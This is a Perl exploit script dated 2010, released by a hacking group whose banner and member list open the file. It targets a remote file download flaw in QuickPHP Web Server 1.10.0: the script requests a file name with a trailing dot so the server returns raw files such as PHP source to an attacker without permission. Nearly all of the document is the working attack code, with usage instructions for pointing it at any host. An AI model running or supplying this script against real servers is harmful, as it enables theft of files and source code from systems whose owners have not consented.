#     _             ____  __            __    ___ 
#    (_)____ _   __/ __ / /_____  ____/ /  _/_/ |
#   / // __  | / / / / / //_/ _ / __  /  / / / /
#  / // / / / |/ / /_/ / ,< /  __/ /_/ /  / / / / 
# /_//_/ /_/|___/____/_/|_|___/__,_/  / /_/_/  
#                   Live by the byte     |_/_/  
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# QuickPHP Web Server is vulnerable for a Remote File Download attcak, the following code will exploit the bug.
# The vulnerability allows an unprivileged attacker to download files whom he has no permissions to.
# -----------------------------------
# Vulnerability Title: QuickPHP Web Server 1.10.0 Remote File Download Exploit
# Date: 30/12/2010
# Author: Pr0T3cT10n
# Software Link: http://www.zachsaw.co.cc/downloads/quickphp_webserver.zip
# Affected Version: 1.10.0
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
###

#!/usr/bin/perl
use LWP::Simple;

if (@ARGV < 3) {
	print("rn");
	print("QuickPHP Web Server 1.10.0 Remote File Download Exploitrn");
	print("Discovered & Exploited by Pr0T3cT10nrn");
	print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-rn");
	print("Usage: " .$0. " <host> <port> <file>rn");
	print("HOST - An host using QuickPHP Web Serverrn");
	print("PORT - Port numberrn");
	print("FILE - The file you want to getrn");
	print("Example: " .$0. " hostingserver.com 80 index.phprnrn");
	exit(1);
} else {
	print("QuickPHP Web Server 1.10.0 Remote File Download Exploitrn");
	print("Discovered & Exploited by Pr0T3cT10nrn");
	print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-rnrn");
	($host, $port, $file) = @ARGV;
	$content = get("http://" .$host. ":" .$port. "/" .$file. ".");
        print("File Content:rnrn");
	print($content. "rn");
}